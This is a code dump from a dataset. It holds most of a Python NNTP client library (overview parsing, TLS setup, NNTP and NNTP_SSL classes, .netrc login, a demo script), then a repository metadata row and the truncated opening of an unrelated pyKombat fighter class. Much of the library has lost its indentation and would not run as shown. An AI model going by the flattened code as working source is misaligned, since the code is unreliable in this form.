"subject", "from", "date", "message-id", "references", ":bytes", ":lines"]
# Alternative names allowed in LIST OVERVIEW.FMT response
_OVERVIEW_FMT_ALTERNATIVES = {
'bytes': ':bytes',
'lines': ':lines',
}
# Line terminators (we always output CRLF, but accept any of CRLF, CR, LF)
_CRLF = b'\r\n'
GroupInfo = collections.namedtuple('GroupInfo',
['group', 'last', 'first', 'flag'])
ArticleInfo = collections.namedtuple('ArticleInfo',
['number', 'message_id', 'lines'])
# Helper function(s)
def decode_header(header_str):
    """Take a unicode string representing a munged (RFC 2047 encoded)
    header value and decode it into a readable, possibly non-ASCII
    string."""
    decoded = []
    for value, charset in _email_decode_header(header_str):
        if isinstance(value, bytes):
            # Undecoded raw bytes: use the declared charset, default ASCII.
            value = value.decode(charset or 'ascii')
        decoded.append(value)
    return ''.join(decoded)
def _parse_overview_fmt(lines):
    """Parse a list of string representing the response to LIST OVERVIEW.FMT
    and return a list of header/metadata names.
    Raises NNTPDataError if the response is not compliant
    (cf. RFC 3977, section 8.4)."""
    fmt = []
    for line in lines:
        if line[0] == ':':
            # Metadata name (e.g. ":bytes"); re-attach the leading colon
            # after stripping any ":suffix" part.
            name, _, suffix = line[1:].partition(':')
            name = ':' + name
        else:
            # Header name (e.g. "Subject:" or "Xref:full"); normalized to
            # lowercase and mapped through the alternative-name table so
            # e.g. "bytes" becomes ":bytes".
            name, _, suffix = line.partition(':')
            name = name.lower()
            name = _OVERVIEW_FMT_ALTERNATIVES.get(name, name)
        # Should we do something with the suffix?
        fmt.append(name)
    defaults = _DEFAULT_OVERVIEW_FMT
    # RFC 3977 requires the response to start with the seven default fields,
    # in order; anything else is a non-compliant server.
    if len(fmt) < len(defaults):
        raise NNTPDataError("LIST OVERVIEW.FMT response too short")
    if fmt[:len(defaults)] != defaults:
        raise NNTPDataError("LIST OVERVIEW.FMT redefines default fields")
    return fmt
def _parse_overview(lines, fmt, data_process_func=None):
    """Parse the response to a OVER or XOVER command according to the
    overview format `fmt`.

    Returns a list of (article_number, fields_dict) tuples, one per line.
    NOTE(review): the `data_process_func` parameter is accepted but never
    used in this implementation.
    """
    n_defaults = len(_DEFAULT_OVERVIEW_FMT)
    overview = []
    for line in lines:
        fields = {}
        # Each overview line is tab-separated: article number first, then
        # one token per field declared in `fmt`.
        article_number, *tokens = line.split('\t')
        article_number = int(article_number)
        for i, token in enumerate(tokens):
            if i >= len(fmt):
                # XXX should we raise an error? Some servers might not
                # support LIST OVERVIEW.FMT and still return additional
                # headers.
                continue
            field_name = fmt[i]
            is_metadata = field_name.startswith(':')
            if i >= n_defaults and not is_metadata:
                # Non-default header names are included in full in the response
                # (unless the field is totally empty), e.g. "Xref: news.foo";
                # strip the "name: " prefix before storing the value.
                h = field_name + ": "
                if token and token[:len(h)].lower() != h:
                    raise NNTPDataError("OVER/XOVER response doesn't include "
                                        "names of additional headers")
                token = token[len(h):] if token else None
            fields[fmt[i]] = token
        overview.append((article_number, fields))
    return overview
def _parse_datetime(date_str, time_str=None):
"""Parse a pair of (date, time) strings, and return a datetime object.
If only the date is given, it is assumed to be date and time
concatenated together (e.g. response to the DATE command).
"""
if time_str is None:
time_str = date_str[-6:]
date_str = date_str[:-6]
hours = int(time_str[:2])
minutes = int(time_str[2:4])
seconds = int(time_str[4:])
year = int(date_str[:-4])
month = int(date_str[-4:-2])
day = int(date_str[-2:])
# RFC 3977 doesn't say how to interpret 2-char years. Assume that
# there are no dates before 1970 on Usenet.
if year < 70:
year += 2000
elif year < 100:
year += 1900
return datetime.datetime(year, month, day, hours, minutes, seconds)
def _unparse_datetime(dt, legacy=False):
"""Format a date or datetime object as a pair of (date, time) strings
in the format required by the NEWNEWS and NEWGROUPS commands. If a
date object is passed, the time is assumed to be midnight (00h00).
The returned representation depends on the legacy flag:
* if legacy is False (the default):
date has the YYYYMMDD format and time the HHMMSS format
* if legacy is True:
date has the YYMMDD format and time the HHMMSS format.
RFC 3977 compliant servers should understand both formats; therefore,
legacy is only needed when talking to old servers.
"""
if not isinstance(dt, datetime.datetime):
time_str = "000000"
else:
time_str = "{0.hour:02d}{0.minute:02d}{0.second:02d}".format(dt)
y = dt.year
if legacy:
y = y % 100
date_str = "{0:02d}{1.month:02d}{1.day:02d}".format(y, dt)
else:
date_str = "{0:04d}{1.month:02d}{1.day:02d}".format(y, dt)
return date_str, time_str
if _have_ssl:
    def _encrypt_on(sock, context, hostname):
        """Wrap a socket in SSL/TLS. Arguments:
        - sock: Socket to wrap
        - context: SSL context to use for the encrypted connection
        - hostname: server hostname, passed through for SNI when supported
        Returns:
        - sock: New, encrypted socket.
        """
        # Generate a default SSL context if none was passed.
        # NOTE(review): ssl._create_stdlib_context is a private ssl-module
        # helper; presumably it applies the stdlib's permissive defaults —
        # confirm its certificate-checking behavior before relying on it.
        if context is None:
            context = ssl._create_stdlib_context()
        # Only send the server hostname when the ssl build supports SNI.
        server_hostname = hostname if ssl.HAS_SNI else None
        return context.wrap_socket(sock, server_hostname=server_hostname)
# The classes themselves
class _NNTPBase:
# UTF-8 is the character set for all NNTP commands and responses: they
# are automatically encoded (when sending) and decoded (and receiving)
# by this class.
# However, some multi-line data blocks can contain arbitrary bytes (for
# example, latin-1 or utf-16 data in the body of a message). Commands
# taking (POST, IHAVE) or returning (HEAD, BODY, ARTICLE) raw message
# data will therefore only accept and produce bytes objects.
# Furthermore, since there could be non-compliant servers out there,
# we use 'surrogateescape' as the error handler for fault tolerance
# and easy round-tripping. This could be useful for some applications
# (e.g. NNTP gateways).
encoding = 'utf-8'
errors = 'surrogateescape'
def __init__(self, file, host,
readermode=None, timeout=_GLOBAL_DEFAULT_TIMEOUT):
"""Initialize an instance. Arguments:
- file: file-like object (open for read/write in binary mode)
- host: hostname of the server
- readermode: if true, send 'mode reader' command after
connecting.
- timeout: timeout (in seconds) used for socket connections
readermode is sometimes necessary if you are connecting to an
NNTP server on the local machine and intend to call
reader-specific commands, such as `group'. If you get
unexpected NNTPPermanentErrors, you might need to set
readermode.
"""
self.host = host
self.file = file
self.debugging = 0
self.welcome = self._getresp()
# Inquire about capabilities (RFC 3977).
self._caps = None
self.getcapabilities()
# 'MODE READER' is sometimes necessary to enable 'reader' mode.
# However, the order in which 'MODE READER' and 'AUTHINFO' need to
# arrive differs between some NNTP servers. If _setreadermode() fails
# with an authorization failed error, it will set this to True;
# the login() routine will interpret that as a request to try again
# after performing its normal function.
# Enable only if we're not already in READER mode anyway.
self.readermode_afterauth = False
if readermode and 'READER' not in self._caps:
self._setreadermode()
if not self.readermode_afterauth:
# Capabilities might have changed after MODE READER
self._caps = None
self.getcapabilities()
# RFC 4642 2.2.2: Both the client and the server MUST know if there is
# a TLS session active. A client MUST NOT attempt to start a TLS
# session if a TLS session is already active.
self.tls_on = False
# Log in and encryption setup order is left to subclasses.
self.authenticated = False
def __enter__(self):
return self
def __exit__(self, *args):
is_connected = lambda: hasattr(self, "file")
if is_connected():
try:
self.quit()
except (OSError, EOFError):
pass
finally:
if is_connected():
self._close()
def getwelcome(self):
"""Get the welcome message from the server
(this is read and squirreled away by __init__()).
If the response code is 200, posting is allowed;
if it 201, posting is not allowed."""
if self.debugging: print('*welcome*', repr(self.welcome))
return self.welcome
def getcapabilities(self):
"""Get the server capabilities, as read by __init__().
If the CAPABILITIES command is not supported, an empty dict is
returned."""
if self._caps is None:
self.nntp_version = 1
self.nntp_implementation = None
try:
resp, caps = self.capabilities()
except (NNTPPermanentError, NNTPTemporaryError):
# Server doesn't support capabilities
self._caps = {}
else:
self._caps = caps
if 'VERSION' in caps:
# The server can advertise several supported versions,
# choose the highest.
self.nntp_version = max(map(int, caps['VERSION']))
if 'IMPLEMENTATION' in caps:
self.nntp_implementation = ' '.join(caps['IMPLEMENTATION'])
return self._caps
def set_debuglevel(self, level):
"""Set the debugging level. Argument 'level' means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
2: also print raw lines read and sent before stripping CR/LF"""
self.debugging = level
debug = set_debuglevel
def _putline(self, line):
"""Internal: send one line to the server, appending CRLF.
The `line` must be a bytes-like object."""
line = line + _CRLF
if self.debugging > 1: print('*put*', repr(line))
self.file.write(line)
self.file.flush()
def _putcmd(self, line):
"""Internal: send one command to the server (through _putline()).
The `line` must be an unicode string."""
if self.debugging: print('*cmd*', repr(line))
line = line.encode(self.encoding, self.errors)
self._putline(line)
def _getline(self, strip_crlf=True):
"""Internal: return one line from the server, stripping _CRLF.
Raise EOFError if the connection is closed.
Returns a bytes object."""
line = self.file.readline(_MAXLINE +1)
if len(line) > _MAXLINE:
raise NNTPDataError('line too long')
if self.debugging > 1:
print('*get*', repr(line))
if not line: raise EOFError
if strip_crlf:
if line[-2:] == _CRLF:
line = line[:-2]
elif line[-1:] in _CRLF:
line = line[:-1]
return line
def _getresp(self):
"""Internal: get a response from the server.
Raise various errors if the response indicates an error.
Returns an unicode string."""
resp = self._getline()
if self.debugging: print('*resp*', repr(resp))
resp = resp.decode(self.encoding, self.errors)
c = resp[:1]
if c == '4':
raise NNTPTemporaryError(resp)
if c == '5':
raise NNTPPermanentError(resp)
if c not in '123':
raise NNTPProtocolError(resp)
return resp
def _getlongresp(self, file=None):
"""Internal: get a response plus following text from the server.
Raise various errors if the response indicates an error.
Returns a (response, lines) tuple where `response` is an unicode
string and `lines` is a list of bytes objects.
If `file` is a file-like object, it must be open in binary mode.
"""
openedFile = None
try:
# If a string was passed then open a file with that name
if isinstance(file, (str, bytes)):
openedFile = file = open(file, "wb")
resp = self._getresp()
if resp[:3] not in _LONGRESP:
raise NNTPReplyError(resp)
lines = []
if file is not None:
# XXX lines = None instead?
terminators = (b'.' + _CRLF, b'.\n')
while 1:
line = self._getline(False)
if line in terminators:
break
if line.startswith(b'..'):
line = line[1:]
file.write(line)
else:
terminator = b'.'
while 1:
line = self._getline()
if line == terminator:
break
if line.startswith(b'..'):
line = line[1:]
lines.append(line)
finally:
# If this method created the file, then it must close it
if openedFile:
openedFile.close()
return resp, lines
def _shortcmd(self, line):
"""Internal: send a command and get the response.
Same return value as _getresp()."""
self._putcmd(line)
return self._getresp()
def _longcmd(self, line, file=None):
"""Internal: send a command and get the response plus following text.
Same return value as _getlongresp()."""
self._putcmd(line)
return self._getlongresp(file)
def _longcmdstring(self, line, file=None):
"""Internal: send a command and get the response plus following text.
Same as _longcmd() and _getlongresp(), except that the returned `lines`
are unicode strings rather than bytes objects.
"""
self._putcmd(line)
resp, list = self._getlongresp(file)
return resp, [line.decode(self.encoding, self.errors)
for line in list]
def _getoverviewfmt(self):
"""Internal: get the overview format. Queries the server if not
already done, else returns the cached value."""
try:
return self._cachedoverviewfmt
except AttributeError:
pass
try:
resp, lines = self._longcmdstring("LIST OVERVIEW.FMT")
except NNTPPermanentError:
# Not supported by server?
fmt = _DEFAULT_OVERVIEW_FMT[:]
else:
fmt = _parse_overview_fmt(lines)
self._cachedoverviewfmt = fmt
return fmt
def _grouplist(self, lines):
# Parse lines into "group last first flag"
return [GroupInfo(*line.split()) for line in lines]
def capabilities(self):
"""Process a CAPABILITIES command. Not supported by all servers.
Return:
- resp: server response if successful
- caps: a dictionary mapping capability names to lists of tokens
(for example {'VERSION': ['2'], 'OVER': [], LIST: ['ACTIVE', 'HEADERS'] })
"""
caps = {}
resp, lines = self._longcmdstring("CAPABILITIES")
for line in lines:
name, *tokens = line.split()
caps[name] = tokens
return resp, caps
def newgroups(self, date, *, file=None):
"""Process a NEWGROUPS command. Arguments:
- date: a date or datetime object
Return:
- resp: server response if successful
- list: list of newsgroup names
"""
if not isinstance(date, (datetime.date, datetime.date)):
raise TypeError(
"the date parameter must be a date or datetime object, "
"not '{:40}'".format(date.__class__.__name__))
date_str, time_str = _unparse_datetime(date, self.nntp_version < 2)
cmd = 'NEWGROUPS {0} {1}'.format(date_str, time_str)
resp, lines = self._longcmdstring(cmd, file)
return resp, self._grouplist(lines)
def newnews(self, group, date, *, file=None):
"""Process a NEWNEWS command. Arguments:
- group: group name or '*'
- date: a date or datetime object
Return:
- resp: server response if successful
- list: list of message ids
"""
if not isinstance(date, (datetime.date, datetime.date)):
raise TypeError(
"the date parameter must be a date or datetime object, "
"not '{:40}'".format(date.__class__.__name__))
date_str, time_str = _unparse_datetime(date, self.nntp_version < 2)
cmd = 'NEWNEWS {0} {1} {2}'.format(group, date_str, time_str)
return self._longcmdstring(cmd, file)
def list(self, group_pattern=None, *, file=None):
"""Process a LIST or LIST ACTIVE command. Arguments:
- group_pattern: a pattern indicating which groups to query
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of (group, last, first, flag) (strings)
"""
if group_pattern is not None:
command = 'LIST ACTIVE ' + group_pattern
else:
command = 'LIST'
resp, lines = self._longcmdstring(command, file)
return resp, self._grouplist(lines)
def _getdescriptions(self, group_pattern, return_all):
line_pat = re.compile('^(?P<group>[^ \t]+)[ \t]+(.*)$')
# Try the more std (acc. to RFC2980) LIST NEWSGROUPS first
resp, lines = self._longcmdstring('LIST NEWSGROUPS ' + group_pattern)
if not resp.startswith('215'):
# Now the deprecated XGTITLE. This either raises an error
# or succeeds with the same output structure as LIST
# NEWSGROUPS.
resp, lines = self._longcmdstring('XGTITLE ' + group_pattern)
groups = {}
for raw_line in lines:
match = line_pat.search(raw_line.strip())
if match:
name, desc = match.group(1, 2)
if not return_all:
return desc
groups[name] = desc
if return_all:
return resp, groups
else:
# Nothing found
return ''
def description(self, group):
"""Get a description for a single group. If more than one
group matches ('group' is a pattern), return the first. If no
group matches, return an empty string.
This elides the response code from the server, since it can
only be '215' or '285' (for xgtitle) anyway. If the response
code is needed, use the 'descriptions' method.
NOTE: This neither checks for a wildcard in 'group' nor does
it check whether the group actually exists."""
return self._getdescriptions(group, False)
def descriptions(self, group_pattern):
"""Get descriptions for a range of groups."""
return self._getdescriptions(group_pattern, True)
def group(self, name):
"""Process a GROUP command. Argument:
- group: the group name
Returns:
- resp: server response if successful
- count: number of articles
- first: first article number
- last: last article number
- name: the group name
"""
resp = self._shortcmd('GROUP ' + name)
if not resp.startswith('211'):
raise NNTPReplyError(resp)
words = resp.split()
count = first = last = 0
n = len(words)
if n > 1:
count = words[1]
if n > 2:
first = words[2]
if n > 3:
last = words[3]
if n > 4:
name = words[4].lower()
return resp, int(count), int(first), int(last), name
def help(self, *, file=None):
"""Process a HELP command. Argument:
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of strings returned by the server in response to the
HELP command
"""
return self._longcmdstring('HELP', file)
def _statparse(self, resp):
"""Internal: parse the response line of a STAT, NEXT, LAST,
ARTICLE, HEAD or BODY command."""
if not resp.startswith('22'):
raise NNTPReplyError(resp)
words = resp.split()
art_num = int(words[1])
message_id = words[2]
return resp, art_num, message_id
def _statcmd(self, line):
"""Internal: process a STAT, NEXT or LAST command."""
resp = self._shortcmd(line)
return self._statparse(resp)
def stat(self, message_spec=None):
"""Process a STAT command. Argument:
- message_spec: article number or message id (if not specified,
the current article is selected)
Returns:
- resp: server response if successful
- art_num: the article number
- message_id: the message id
"""
if message_spec:
return self._statcmd('STAT {0}'.format(message_spec))
else:
return self._statcmd('STAT')
def next(self):
"""Process a NEXT command. No arguments. Return as for STAT."""
return self._statcmd('NEXT')
def last(self):
"""Process a LAST command. No arguments. Return as for STAT."""
return self._statcmd('LAST')
def _artcmd(self, line, file=None):
"""Internal: process a HEAD, BODY or ARTICLE command."""
resp, lines = self._longcmd(line, file)
resp, art_num, message_id = self._statparse(resp)
return resp, ArticleInfo(art_num, message_id, lines)
def head(self, message_spec=None, *, file=None):
"""Process a HEAD command. Argument:
- message_spec: article number or message id
- file: filename string or file object to store the headers in
Returns:
- resp: server response if successful
- ArticleInfo: (article number, message id, list of header lines)
"""
if message_spec is not None:
cmd = 'HEAD {0}'.format(message_spec)
else:
cmd = 'HEAD'
return self._artcmd(cmd, file)
def body(self, message_spec=None, *, file=None):
"""Process a BODY command. Argument:
- message_spec: article number or message id
- file: filename string or file object to store the body in
Returns:
- resp: server response if successful
- ArticleInfo: (article number, message id, list of body lines)
"""
if message_spec is not None:
cmd = 'BODY {0}'.format(message_spec)
else:
cmd = 'BODY'
return self._artcmd(cmd, file)
def article(self, message_spec=None, *, file=None):
"""Process an ARTICLE command. Argument:
- message_spec: article number or message id
- file: filename string or file object to store the article in
Returns:
- resp: server response if successful
- ArticleInfo: (article number, message id, list of article lines)
"""
if message_spec is not None:
cmd = 'ARTICLE {0}'.format(message_spec)
else:
cmd = 'ARTICLE'
return self._artcmd(cmd, file)
def slave(self):
"""Process a SLAVE command. Returns:
- resp: server response if successful
"""
return self._shortcmd('SLAVE')
def xhdr(self, hdr, str, *, file=None):
"""Process an XHDR command (optional server extension). Arguments:
- hdr: the header type (e.g. 'subject')
- str: an article nr, a message id, or a range nr1-nr2
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of (nr, value) strings
"""
pat = re.compile('^([0-9]+) ?(.*)\n?')
resp, lines = self._longcmdstring('XHDR {0} {1}'.format(hdr, str), file)
def remove_number(line):
m = pat.match(line)
return m.group(1, 2) if m else line
return resp, [remove_number(line) for line in lines]
def xover(self, start, end, *, file=None):
"""Process an XOVER command (optional server extension) Arguments:
- start: start of range
- end: end of range
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of dicts containing the response fields
"""
resp, lines = self._longcmdstring('XOVER {0}-{1}'.format(start, end),
file)
fmt = self._getoverviewfmt()
return resp, _parse_overview(lines, fmt)
def over(self, message_spec, *, file=None):
"""Process an OVER command. If the command isn't supported, fall
back to XOVER. Arguments:
- message_spec:
- either a message id, indicating the article to fetch
information about
- or a (start, end) tuple, indicating a range of article numbers;
if end is None, information up to the newest message will be
retrieved
- or None, indicating the current article number must be used
- file: Filename string or file object to store the result in
Returns:
- resp: server response if successful
- list: list of dicts containing the response fields
NOTE: the "message id" form isn't supported by XOVER
"""
cmd = 'OVER' if 'OVER' in self._caps else 'XOVER'
if isinstance(message_spec, (tuple, list)):
start, end = message_spec
cmd += ' {0}-{1}'.format(start, end or '')
elif message_spec is not None:
cmd = cmd + ' ' + message_spec
resp, lines = self._longcmdstring(cmd, file)
fmt = self._getoverviewfmt()
return resp, _parse_overview(lines, fmt)
def xgtitle(self, group, *, file=None):
"""Process an XGTITLE command (optional server extension) Arguments:
- group: group name wildcard (i.e. news.*)
Returns:
- resp: server response if successful
- list: list of (name,title) strings"""
warnings.warn("The XGTITLE extension is not actively used, "
"use descriptions() instead",
DeprecationWarning, 2)
line_pat = re.compile('^([^ \t]+)[ \t]+(.*)$')
resp, raw_lines = self._longcmdstring('XGTITLE ' + group, file)
lines = []
for raw_line in raw_lines:
match = line_pat.search(raw_line.strip())
if match:
lines.append(match.group(1, 2))
return resp, lines
def xpath(self, id):
"""Process an XPATH command (optional server extension) Arguments:
- id: Message id of article
Returns:
resp: server response if successful
path: directory path to article
"""
warnings.warn("The XPATH extension is not actively used",
DeprecationWarning, 2)
resp = self._shortcmd('XPATH {0}'.format(id))
if not resp.startswith('223'):
raise NNTPReplyError(resp)
try:
[resp_num, path] = resp.split()
except ValueError:
raise NNTPReplyError(resp)
else:
return resp, path
def date(self):
"""Process the DATE command.
Returns:
- resp: server response if successful
- date: datetime object
"""
resp = self._shortcmd("DATE")
if not resp.startswith('111'):
raise NNTPReplyError(resp)
elem = resp.split()
if len(elem) != 2:
raise NNTPDataError(resp)
date = elem[1]
if len(date) != 14:
raise NNTPDataError(resp)
return resp, _parse_datetime(date, None)
def _post(self, command, f):
resp = self._shortcmd(command)
# Raises a specific exception if posting is not allowed
if not resp.startswith('3'):
raise NNTPReplyError(resp)
if isinstance(f, (bytes, bytearray)):
f = f.splitlines()
# We don't use _putline() because:
# - we don't want additional CRLF if the file or iterable is already
# in the right format
# - we don't want a spurious flush() after each line is written
for line in f:
if not line.endswith(_CRLF):
line = line.rstrip(b"\r\n") + _CRLF
if line.startswith(b'.'):
line = b'.' + line
self.file.write(line)
self.file.write(b".\r\n")
self.file.flush()
return self._getresp()
def post(self, data):
"""Process a POST command. Arguments:
- data: bytes object, iterable or file containing the article
Returns:
- resp: server response if successful"""
return self._post('POST', data)
def ihave(self, message_id, data):
"""Process an IHAVE command. Arguments:
- message_id: message-id of the article
- data: file containing the article
Returns:
- resp: server response if successful
Note that if the server refuses the article an exception is raised."""
return self._post('IHAVE {0}'.format(message_id), data)
def _close(self):
self.file.close()
del self.file
def quit(self):
"""Process a QUIT command and close the socket. Returns:
- resp: server response if successful"""
try:
resp = self._shortcmd('QUIT')
finally:
self._close()
return resp
def login(self, user=None, password=None, usenetrc=True):
if self.authenticated:
raise ValueError("Already logged in.")
if not user and not usenetrc:
raise ValueError(
"At least one of `user` and `usenetrc` must be specified")
# If no login/password was specified but netrc was requested,
# try to get them from ~/.netrc
# Presume that if .netrc has an entry, NNRP authentication is required.
try:
if usenetrc and not user:
import netrc
credentials = netrc.netrc()
auth = credentials.authenticators(self.host)
if auth:
user = auth[0]
password = auth[2]
except OSError:
pass
# Perform NNTP authentication if needed.
if not user:
return
resp = self._shortcmd('authinfo user ' + user)
if resp.startswith('381'):
if not password:
raise NNTPReplyError(resp)
else:
resp = self._shortcmd('authinfo pass ' + password)
if not resp.startswith('281'):
raise NNTPPermanentError(resp)
# Capabilities might have changed after login
self._caps = None
self.getcapabilities()
# Attempt to send mode reader if it was requested after login.
# Only do so if we're not in reader mode already.
if self.readermode_afterauth and 'READER' not in self._caps:
self._setreadermode()
# Capabilities might have changed after MODE READER
self._caps = None
self.getcapabilities()
def _setreadermode(self):
try:
self.welcome = self._shortcmd('mode reader')
except NNTPPermanentError:
# Error 5xx, probably 'not implemented'
pass
except NNTPTemporaryError as e:
if e.response.startswith('480'):
# Need authorization before 'mode reader'
self.readermode_afterauth = True
else:
raise
if _have_ssl:
def starttls(self, context=None):
"""Process a STARTTLS command. Arguments:
- context: SSL context to use for the encrypted connection
"""
# Per RFC 4642, STARTTLS MUST NOT be sent after authentication or if
# a TLS session already exists.
if self.tls_on:
raise ValueError("TLS is already enabled.")
if self.authenticated:
raise ValueError("TLS cannot be started after authentication.")
resp = self._shortcmd('STARTTLS')
if resp.startswith('382'):
self.file.close()
self.sock = _encrypt_on(self.sock, context, self.host)
self.file = self.sock.makefile("rwb")
self.tls_on = True
# Capabilities may change after TLS starts up, so ask for them
# again.
self._caps = None
self.getcapabilities()
else:
raise NNTPError("TLS failed to start.")
class NNTP(_NNTPBase):

    def __init__(self, host, port=NNTP_PORT, user=None, password=None,
                 readermode=None, usenetrc=False,
                 timeout=_GLOBAL_DEFAULT_TIMEOUT):
        """Initialize an instance.  Arguments:
        - host: hostname to connect to
        - port: port to connect to (default the standard NNTP port)
        - user: username to authenticate with
        - password: password to use with username
        - readermode: if true, send 'mode reader' command after
                      connecting.
        - usenetrc: allow loading username and password from ~/.netrc file
                    if not specified explicitly
        - timeout: timeout (in seconds) used for socket connections

        readermode is sometimes necessary if you are connecting to an
        NNTP server on the local machine and intend to call
        reader-specific commands, such as `group'.  If you get
        unexpected NNTPPermanentErrors, you might need to set
        readermode.
        """
        self.host = host
        self.port = port
        self.sock = socket.create_connection((host, port), timeout)
        file = None
        # Fix: don't leak the socket (and its file wrapper) when the
        # greeting, capability exchange or login raises after connect.
        try:
            file = self.sock.makefile("rwb")
            _NNTPBase.__init__(self, file, host,
                               readermode, timeout)
            if user or usenetrc:
                self.login(user, password, usenetrc)
        except BaseException:
            if file is not None:
                file.close()
            self.sock.close()
            raise

    def _close(self):
        # Close the protocol-level resources first, then the socket,
        # even if the base-class close fails.
        try:
            _NNTPBase._close(self)
        finally:
            self.sock.close()
if _have_ssl:
    class NNTP_SSL(_NNTPBase):

        def __init__(self, host, port=NNTP_SSL_PORT,
                     user=None, password=None, ssl_context=None,
                     readermode=None, usenetrc=False,
                     timeout=_GLOBAL_DEFAULT_TIMEOUT):
            """This works identically to NNTP.__init__, except for the change
            in default port and the `ssl_context` argument for SSL connections.
            """
            self.sock = socket.create_connection((host, port), timeout)
            file = None
            # Fix: don't leak the socket (and its file wrapper) when the
            # TLS handshake, greeting or login raises after connect.
            try:
                self.sock = _encrypt_on(self.sock, ssl_context, host)
                file = self.sock.makefile("rwb")
                _NNTPBase.__init__(self, file, host,
                                   readermode=readermode, timeout=timeout)
                if user or usenetrc:
                    self.login(user, password, usenetrc)
            except BaseException:
                if file is not None:
                    file.close()
                self.sock.close()
                raise

        def _close(self):
            # Close protocol resources first, then the socket, even if
            # the base-class close fails.
            try:
                _NNTPBase._close(self)
            finally:
                self.sock.close()

    __all__.append("NNTP_SSL")
# Test retrieval when run as a script.
if __name__ == '__main__':
    import argparse
    # Fix: removed the unused `from email.utils import parsedate` import.

    parser = argparse.ArgumentParser(description="""\
        nntplib built-in demo - display the latest articles in a newsgroup""")
    parser.add_argument('-g', '--group', default='gmane.comp.python.general',
                        help='group to fetch messages from (default: %(default)s)')
    parser.add_argument('-s', '--server', default='news.gmane.org',
                        help='NNTP server hostname (default: %(default)s)')
    parser.add_argument('-p', '--port', default=-1, type=int,
                        help='NNTP port number (default: %s / %s)' % (NNTP_PORT, NNTP_SSL_PORT))
    parser.add_argument('-n', '--nb-articles', default=10, type=int,
                        help='number of articles to fetch (default: %(default)s)')
    parser.add_argument('-S', '--ssl', action='store_true', default=False,
                        help='use NNTP over SSL')
    args = parser.parse_args()

    # Pick the transport-appropriate default port when none was given.
    port = args.port
    if not args.ssl:
        if port == -1:
            port = NNTP_PORT
        s = NNTP(host=args.server, port=port)
    else:
        if port == -1:
            port = NNTP_SSL_PORT
        s = NNTP_SSL(host=args.server, port=port)

    # Opportunistically upgrade to TLS when the server advertises it.
    caps = s.getcapabilities()
    if 'STARTTLS' in caps:
        s.starttls()

    resp, count, first, last, name = s.group(args.group)
    print('Group', name, 'has', count, 'articles, range', first, 'to', last)

    def cut(s, lim):
        """Truncate *s* to *lim* characters, marking the cut with '...'."""
        if len(s) > lim:
            s = s[:lim - 4] + "..."
        return s

    # Fetch overviews for the last N articles and print one summary line each.
    first = str(int(last) - args.nb_articles + 1)
    resp, overviews = s.xover(first, last)
    for artnum, over in overviews:
        author = decode_header(over['from']).split('<', 1)[0]
        subject = decode_header(over['subject'])
        lines = int(over[':lines'])
        print("{:7} {:20} {:42} ({})".format(
            artnum, cut(author, 20), cut(subject, 42), lines)
        )

    s.quit()
| [
"tpsatish95@gmail.com"
] | tpsatish95@gmail.com |
b58ca7421c8bed7d4672349b37925015a9d1977a | 1fe03131ad139e2415fd0c0c73697b4541e5b862 | /.history/src/_fighter_20190422143244.py | 298ac4c7dbdcfafdc0a401584a8ebb9a79481efe | [
"MIT"
] | permissive | vidalmatheus/pyKombat | d83175a7a952663e278a8247d43349f87192fde3 | 6646020c59367ba0424d73a5861e13bbc0daac1f | refs/heads/master | 2021-06-20T09:35:07.950596 | 2020-08-06T14:08:13 | 2020-08-06T14:08:13 | 172,716,161 | 1 | 1 | MIT | 2019-12-25T10:54:10 | 2019-02-26T13:24:31 | Python | UTF-8 | Python | false | false | 37,663 | py |
from pygame_functions import *
import fightScene
import engine
import menu
class Fighter:
    """A pyKombat fighter: sprite sheets, input bindings and fight state.

    Class attributes hold per-character configuration (names, key
    bindings, frame counts) and the index of each move's sprite sheet
    inside ``spriteList``.
    """
    fighterNames = ["Sub-Zero", "Scorpion"]
    fightMoves = [["w", "s", "a", "d"], ["up", "down", "left", "right"]]
    combatMoves = [["j","n","k","m","l","u","f"],["1","4","2","5","3","0","6"]]
    # frame counts of each animation sheet
    danceLimit = 7
    walkLimit = 9
    jumpLimit = 3
    crouchLimit = 3
    punchLimit = [3, 11, 3, 5, 3]
    kickLimit = [7, 9, 7, 6, 3]
    hitLimit = [3, 3, 6, 2, 3, 14, 11, 10]
    blockLimit = 3
    specialLimit = [4,7]
    victoryLimit = 3
    fatalityLimit = 20
    dizzyLimit = 7
    # sprite-sheet indexing into spriteList
    # moves
    dance = 0
    walk = 1
    jump = 2
    crouch = 3
    # punches
    Apunch = 4 # weak punch
    Bpunch = 5 # strong punch
    Cpunch = 6 # weak crouching punch
    Dpunch = 7 # strong crouching punch: uppercut
    # kicks
    Akick = 8 # weak kick
    Bkick = 9 # strong kick
    Ckick = 10 # weak crouching kick
    Dkick = 11 # strong crouching kick: sweep
    # hits (reaction animations)
    Ahit = 12 # weak punch
    Bhit = 13 # weak kick
    Chit = 14 # strong punch
    Dhit = 15 # weak crouching punch
    Ehit = 16 # weak crouching hit
    Fhit = 17 # strong kick and strong crouching punch (uppercut)
    Ghit = 18 # strong crouching kick: sweep
    #Hhit = 19 # specialMove
    #fatalityHit = 20 # fatality hit
    # block
    Ablock = 19
    #Bblock = 13
    # NOTE(review): fight() still references self.Bblock although the
    # attribute above is commented out; that branch would raise
    # AttributeError if reached -- confirm and restore or remove.
    # special move
    special = 20
    # fatality
    fatality = 24
def __init__(self, id, scenario):
self.fighterId = id
self.name = self.fighterNames[id]
self.move = self.fightMoves[id]
self.combat = self.combatMoves[id]
# Position
self.x = 150+id*500
if scenario == 1:
self.y = 350
elif scenario == 2:
self.y = 370
elif scenario == 3:
self.y = 400
elif scenario == 4:
self.y = 370
elif scenario == 5:
self.y = 380
elif scenario == 6:
self.y = 380
elif scenario == 7:
self.y = 360
elif scenario == 8:
self.y = 395
# Loading sprites
self.spriteList = []
# moves
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/dance.png', self.danceLimit))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/walk.png', self.walkLimit))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/jump.png', self.jumpLimit))
self.spriteList.append(makeSprite('../res/Char/'+str(self.name)+'/crouch.png', self.crouchLimit))
# Punch sprites
